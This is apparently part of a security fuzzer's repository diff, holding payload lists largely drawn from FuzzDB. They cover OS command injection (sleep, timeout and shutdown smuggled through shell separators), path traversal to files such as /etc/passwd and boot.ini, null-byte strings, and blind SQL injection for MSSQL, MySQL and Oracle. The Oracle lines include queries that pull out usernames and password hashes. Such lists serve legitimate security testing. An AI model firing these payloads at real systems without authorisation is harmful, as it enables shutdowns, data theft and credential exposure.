<!--#exec cmd="shutdown"-->
;system('shutdown')
sleep 20000
;sleep 20000
;sleep 20000;
^sleep 20000
|sleep 20000
<sleep 20000
<sleep 20000;
<sleep 20000\n
<sleep 20000%0D
<sleep 20000%0A
&sleep 20000
&sleep 20000&
&&sleep 20000
&&sleep 20000&&
%0Dsleep 20000
%0Dsleep 20000%0D
%0Asleep 20000
%0Asleep 20000%0A
\nsleep 20000
\nsleep 20000\n
'sleep 20000'
`sleep 20000`
;sleep 20000|
;sleep 20000/n
|sleep 20000;
a);sleep 20000
a;sleep 20000
a);sleep 20000
a;sleep 20000;
a);sleep 20000|
FAIL||sleep 20000
CMD=$'sleep 20000';$CMD
;CMD=$'sleep 20000';$CMD
^CMD=$'sleep 20000';$CMD
|CMD=$'sleep 20000';$CMD
&CMD=$'sleep 20000';$CMD
&&CMD=$'sleep 20000';$CMD
%0DCMD=$'sleep 20000';$CMD
FAIL||CMD=$'sleep 20000';$CMD
CMD=$\'sleep 20000\';$CMD
;CMD=$\'sleep 20000\';$CMD
^CMD=$\'sleep 20000\';$CMD
|CMD=$\'sleep 20000\';$CMD
&CMD=$\'sleep 20000\';$CMD
&&CMD=$\'sleep 20000\';$CMD
%0DCMD=$\'sleep 20000\';$CMD
FAIL||CMD=$\'sleep 20000\';$CMD
CMD=$"sleep 20000";$CMD
;CMD=$"sleep 20000";$CMD
^CMD=$"sleep 20000";$CMD
|CMD=$"sleep 20000";$CMD
&CMD=$"sleep 20000";$CMD
&&CMD=$"sleep 20000";$CMD
%0DCMD=$"sleep 20000";$CMD
FAIL||CMD=$"sleep 20000";$CMD
<!--#exec cmd="sleep 20000"-->
;system('sleep 20000')

117
fuzzer/src/payloads/lists/os-command-injection/windows-injections.txt Normal file
View File

@@ -0,0 +1,117 @@
# Based on FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/os-cmd-execution/command-injection-template.txt)
timeout 20000
;timeout 20000
;timeout 20000;
^timeout 20000
|timeout 20000
<timeout 20000
<timeout 20000;
<timeout 20000\n
<timeout 20000%0D
<timeout 20000%0A
&timeout 20000
&timeout 20000&
&&timeout 20000
&&timeout 20000&&
%0Dtimeout 20000
%0Dtimeout 20000%0D
%0Atimeout 20000
%0Atimeout 20000%0A
\ntimeout 20000
\ntimeout 20000\n
'timeout 20000'
`timeout 20000`
;timeout 20000|
;timeout 20000/n
|timeout 20000;
a);timeout 20000
a;timeout 20000
a);timeout 20000
a;timeout 20000;
a);timeout 20000|
FAIL||timeout 20000
CMD=$'timeout 20000';$CMD
;CMD=$'timeout 20000';$CMD
^CMD=$'timeout 20000';$CMD
|CMD=$'timeout 20000';$CMD
&CMD=$'timeout 20000';$CMD
&&CMD=$'timeout 20000';$CMD
%0DCMD=$'timeout 20000';$CMD
FAIL||CMD=$'timeout 20000';$CMD
CMD=$\'timeout 20000\';$CMD
;CMD=$\'timeout 20000\';$CMD
^CMD=$\'timeout 20000\';$CMD
|CMD=$\'timeout 20000\';$CMD
&CMD=$\'timeout 20000\';$CMD
&&CMD=$\'timeout 20000\';$CMD
%0DCMD=$\'timeout 20000\';$CMD
FAIL||CMD=$\'timeout 20000\';$CMD
CMD=$"timeout 20000";$CMD
;CMD=$"timeout 20000";$CMD
^CMD=$"timeout 20000";$CMD
|CMD=$"timeout 20000";$CMD
&CMD=$"timeout 20000";$CMD
&&CMD=$"timeout 20000";$CMD
%0DCMD=$"timeout 20000";$CMD
FAIL||CMD=$"timeout 20000";$CMD
<!--#exec cmd="timeout 20000"-->
;system('timeout 20000')
shutdown -h now
;shutdown -h now
;shutdown -h now;
^shutdown -h now
|shutdown -h now
<shutdown -h now
<shutdown -h now;
<shutdown -h now\n
<shutdown -h now%0D
<shutdown -h now%0A
&shutdown -h now
&shutdown -h now&
&&shutdown -h now
&&shutdown -h now&&
%0Dshutdown -h now
%0Dshutdown -h now%0D
%0Ashutdown -h now
%0Ashutdown -h now%0A
\nshutdown -h now
\nshutdown -h now\n
'shutdown -h now'
`shutdown -h now`
;shutdown -h now|
;shutdown -h now/n
|shutdown -h now;
a);shutdown -h now
a;shutdown -h now
a);shutdown -h now
a;shutdown -h now;
a);shutdown -h now|
FAIL||shutdown -h now
CMD=$'shutdown -h now';$CMD
;CMD=$'shutdown -h now';$CMD
^CMD=$'shutdown -h now';$CMD
|CMD=$'shutdown -h now';$CMD
&CMD=$'shutdown -h now';$CMD
&&CMD=$'shutdown -h now';$CMD
%0DCMD=$'shutdown -h now';$CMD
FAIL||CMD=$'shutdown -h now';$CMD
CMD=$\'shutdown -h now\';$CMD
;CMD=$\'shutdown -h now\';$CMD
^CMD=$\'shutdown -h now\';$CMD
|CMD=$\'shutdown -h now\';$CMD
&CMD=$\'shutdown -h now\';$CMD
&&CMD=$\'shutdown -h now\';$CMD
%0DCMD=$\'shutdown -h now\';$CMD
FAIL||CMD=$\'shutdown -h now\';$CMD
CMD=$"shutdown -h now";$CMD
;CMD=$"shutdown -h now";$CMD
^CMD=$"shutdown -h now";$CMD
|CMD=$"shutdown -h now";$CMD
&CMD=$"shutdown -h now";$CMD
&&CMD=$"shutdown -h now";$CMD
%0DCMD=$"shutdown -h now";$CMD
FAIL||CMD=$"shutdown -h now";$CMD
<!--#exec cmd="shutdown -h now"-->
;system('shutdown -h now')

16
fuzzer/src/payloads/lists/path-traversal/existing-files-unix.txt Normal file
View File

@@ -0,0 +1,16 @@
# RELATIVE PATHS
../../../../../../../../../../../../../../../../../apache/logs/access.log
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../apache/logs/
../../../../../../../../../../../../../../../../../etc/
../../../../../../../../../../../../../../../../../opt/
../../../../../../../../../../../../../../../../../var/
# ABSOLUTE PATHS
/apache/logs/access.log
/etc/passwd
/apache/logs/
/etc/
/opt/
/var/

23
fuzzer/src/payloads/lists/path-traversal/existing-files-windows.txt Normal file
View File

@@ -0,0 +1,23 @@
# RELATIVE PATHS
../../../../../../../../../../../../../../../../../boot.ini
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
../../../../../../../../../../../../../../../../../
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\
../../../../../../../../../../../../../../../../../inetpub/wwwroot/index.asp
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\inetpub\wwwroot\index.asp
../../../../../../../../../../../../../../../../../inetpub/wwwroot/
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\inetpub\wwwroot\
# ABSOLUTE PATHS
c:\boot.ini
c:\
c:\inetpub\wwwroot\index.asp
c:\inetpub\
c:\pagefile.sys
c:\Windows\system.ini
c:\Windows\
c:\Windows\System32\drivers\etc\hosts
c:\Windows\System32\drivers\etc\

12
fuzzer/src/payloads/lists/path-traversal/non-existing-files.txt Normal file
View File

@@ -0,0 +1,12 @@
# Generic relative paths
../../../../../../../../../../../../../../../../../unknown/unknown.log
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\unknown/unknown.log
../../../../../../../../../../../../../../../../../unknown
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\unknown
# Windows absolute paths
c:\unknown\unknown
# UNIX absolute paths
/unknown/unknown

257
fuzzer/src/payloads/lists/special-chars-generic/all-bytes-hex.txt Normal file
View File

@@ -0,0 +1,257 @@
# Generated
%00
%01
%02
%03
%04
%05
%06
%07
%08
%09
%0a
%0b
%0c
%0d
%0e
%0f
%10
%11
%12
%13
%14
%15
%16
%17
%18
%19
%1a
%1b
%1c
%1d
%1e
%1f
%20
%21
%22
%23
%24
%25
%26
%27
%28
%29
%2a
%2b
%2c
%2d
%2e
%2f
%30
%31
%32
%33
%34
%35
%36
%37
%38
%39
%3a
%3b
%3c
%3d
%3e
%3f
%40
%41
%42
%43
%44
%45
%46
%47
%48
%49
%4a
%4b
%4c
%4d
%4e
%4f
%50
%51
%52
%53
%54
%55
%56
%57
%58
%59
%5a
%5b
%5c
%5d
%5e
%5f
%60
%61
%62
%63
%64
%65
%66
%67
%68
%69
%6a
%6b
%6c
%6d
%6e
%6f
%70
%71
%72
%73
%74
%75
%76
%77
%78
%79
%7a
%7b
%7c
%7d
%7e
%7f
%80
%81
%82
%83
%84
%85
%86
%87
%88
%89
%8a
%8b
%8c
%8d
%8e
%8f
%90
%91
%92
%93
%94
%95
%96
%97
%98
%99
%9a
%9b
%9c
%9d
%9e
%9f
%a0
%a1
%a2
%a3
%a4
%a5
%a6
%a7
%a8
%a9
%aa
%ab
%ac
%ad
%ae
%af
%b0
%b1
%b2
%b3
%b4
%b5
%b6
%b7
%b8
%b9
%ba
%bb
%bc
%bd
%be
%bf
%c0
%c1
%c2
%c3
%c4
%c5
%c6
%c7
%c8
%c9
%ca
%cb
%cc
%cd
%ce
%cf
%d0
%d1
%d2
%d3
%d4
%d5
%d6
%d7
%d8
%d9
%da
%db
%dc
%dd
%de
%df
%e0
%e1
%e2
%e3
%e4
%e5
%e6
%e7
%e8
%e9
%ea
%eb
%ec
%ed
%ee
%ef
%f0
%f1
%f2
%f3
%f4
%f5
%f6
%f7
%f8
%f9
%fa
%fb
%fc
%fd
%fe
%ff

258
fuzzer/src/payloads/lists/special-chars-generic/all-bytes-raw.txt Normal file
View File

@@ -0,0 +1,258 @@
# Generated


























!
"
#
$
%
&
'
(
)
*
+
,
-
.
/
0
1
2
3
4
5
6
7
8
9
:
;
<
=
>
?
@
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
[
\
]
^
_
`
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
{
|
}
~

<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>

7
fuzzer/src/payloads/lists/special-chars-generic/long-strings.txt Normal file
View File

File diff suppressed because one or more lines are too long

57
fuzzer/src/payloads/lists/special-chars-generic/null-bytes.txt Normal file
View File

@@ -0,0 +1,57 @@
# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/control-chars/NullByteRepresentations.txt)
%00
%00%00
\0
\0\
\00
\00\
\0\0
\0\0\
\0\0
\00\00\
\000
\000\
\0000
\0000\
\x00
\x00\
\x00\x00
\x00\x00\
\x0000
\x0000\
\x00000000
\x00000000\
\u0000
\u0000\
\u00000000
\u00000000\
\u0000\u0000
\u0000\u0000\
\z
\z\
NUL
NULL
nul
null
FALSE
false
0x00
0x0000
0x00000000
&#0;
&#x0;
"\u0000"
u"\u0000"
0
00
0000
00000000
%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00
%C0%80
%E0%80%80
%F0%80%80%80
%F8%80%80%80%80
%FC%80%80%80%80%80
%FE%80%80%80%80%80%80
<EFBFBD>

33
fuzzer/src/payloads/lists/special-chars-generic/special-characters.txt Normal file
View File

@@ -0,0 +1,33 @@
.
,
+
-
_
;
/
|
#
<
>
?
!
\
"
'
`
*
(
)
[
]
{
}
^
~
=
@
$
&
:
%

34
fuzzer/src/payloads/lists/sql-injection/generic-blind.txt Normal file
View File

@@ -0,0 +1,34 @@
# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/sql-injection/detect/GenericBlind.txt)
sleep(200000)
sleep(200000)#
1 or sleep(200000)#
" or sleep(200000)#
' or sleep(200000)#
" or sleep(200000)="
' or sleep(200000)='
1) or sleep(200000)#
") or sleep(200000)="
') or sleep(200000)='
1)) or sleep(200000)#
")) or sleep(200000)="
')) or sleep(200000)='
;waitfor delay '0:0:200000'--
);waitfor delay '0:0:200000'--
';waitfor delay '0:0:200000'--
";waitfor delay '0:0:200000'--
');waitfor delay '0:0:200000'--
");waitfor delay '0:0:200000'--
));waitfor delay '0:0:200000'--
'));waitfor delay '0:0:200000'--
"));waitfor delay '0:0:200000'--
benchmark(1000000000,MD5(1))#
1 or benchmark(1000000000,MD5(1))#
" or benchmark(1000000000,MD5(1))#
' or benchmark(1000000000,MD5(1))#
1) or benchmark(1000000000,MD5(1))#
") or benchmark(1000000000,MD5(1))#
') or benchmark(1000000000,MD5(1))#
1)) or benchmark(1000000000,MD5(1))#
")) or benchmark(1000000000,MD5(1))#
')) or benchmark(1000000000,MD5(1))#

52
fuzzer/src/payloads/lists/sql-injection/mssql-blind.txt Normal file
View File

@@ -0,0 +1,52 @@
# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection/payloads-sql-blind)
# Origin source: http://funoverip.net/2010/12/blind-sql-injection-detection-with-burp-suite/
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:200000' --
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:200000' --
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:200000' --
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:200000' --
'; if not(select system_user) <> 'sa' waitfor delay '0:0:200000' --
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:200000' --
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:200000' --
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:200000' --
waitfor delay '0:0:200000' /*
waitfor delay '0:0:200000' --
' waitfor delay '0:0:200000' /*
' waitfor delay '0:0:200000' --
" waitfor delay '0:0:200000' /*
" waitfor delay '0:0:200000' --
) waitfor delay '0:0:200000' /*
) waitfor delay '0:0:200000' --
)) waitfor delay '0:0:200000' /*
)) waitfor delay '0:0:200000' --
))) waitfor delay '0:0:200000' /*
))) waitfor delay '0:0:200000' --
)))) waitfor delay '0:0:200000' /*
)))) waitfor delay '0:0:200000' --
))))) waitfor delay '0:0:200000' --
)))))) waitfor delay '0:0:200000' --
') waitfor delay '0:0:200000' /*
') waitfor delay '0:0:200000' --
") waitfor delay '0:0:200000' /*
") waitfor delay '0:0:200000' --
')) waitfor delay '0:0:200000' /*
')) waitfor delay '0:0:200000' --
")) waitfor delay '0:0:200000' /*
")) waitfor delay '0:0:200000' --
'))) waitfor delay '0:0:200000' /*
'))) waitfor delay '0:0:200000' --
"))) waitfor delay '0:0:200000' /*
"))) waitfor delay '0:0:200000' --
')))) waitfor delay '0:0:200000' /*
')))) waitfor delay '0:0:200000' --
")))) waitfor delay '0:0:200000' /*
")))) waitfor delay '0:0:200000' --
'))))) waitfor delay '0:0:200000' /*
'))))) waitfor delay '0:0:200000' --
"))))) waitfor delay '0:0:200000' /*
"))))) waitfor delay '0:0:200000' --
')))))) waitfor delay '0:0:200000' /*
')))))) waitfor delay '0:0:200000' --
")))))) waitfor delay '0:0:200000' /*
")))))) waitfor delay '0:0:200000' --

22
fuzzer/src/payloads/lists/sql-injection/mysql-blind.txt Normal file
View File

@@ -0,0 +1,22 @@
# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection/payloads-sql-blind)
# Origin source: http://funoverip.net/2010/12/blind-sql-injection-detection-with-burp-suite/
1
1 and user_name() = 'dbo'
\'; desc users; --
1\'1
1' and non_existant_table = '1
' or username is not NULL or username = '
1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
1 uni/**/on select all from where
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1
1or1=1
1'or'1'='1
fake@ema'or'il.nl'='il.nl

58
fuzzer/src/payloads/lists/sql-injection/oracle-blind.txt Normal file
View File

@@ -0,0 +1,58 @@
# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection/payloads-sql-blind)
# Origin source: http://funoverip.net/2010/12/blind-sql-injection-detection-with-burp-suite/
or 1=1
' or '1'='1
'||utl_http.request('httP://192.168.1.1/')||'
' || myappadmin.adduser('admin', 'newpass') || '
' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i

12
